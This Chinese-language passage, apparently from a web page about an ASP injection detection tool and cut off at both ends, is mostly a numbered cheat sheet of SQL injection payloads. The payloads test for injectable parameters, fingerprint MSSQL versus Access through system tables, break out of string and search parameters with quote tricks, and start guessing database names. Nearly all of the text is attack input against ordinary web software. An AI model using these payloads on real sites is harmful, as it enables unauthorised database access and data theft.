测工具的名称,ASP注入漏洞检测工具,特别在SQL Server注入检测方面有极高的准确率。 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 4.注入参数是字符 'and [查询条件] and ''=' 5.搜索时没过滤参数的 'and [查询条件] and '%25'=' 6.猜数据库 ;and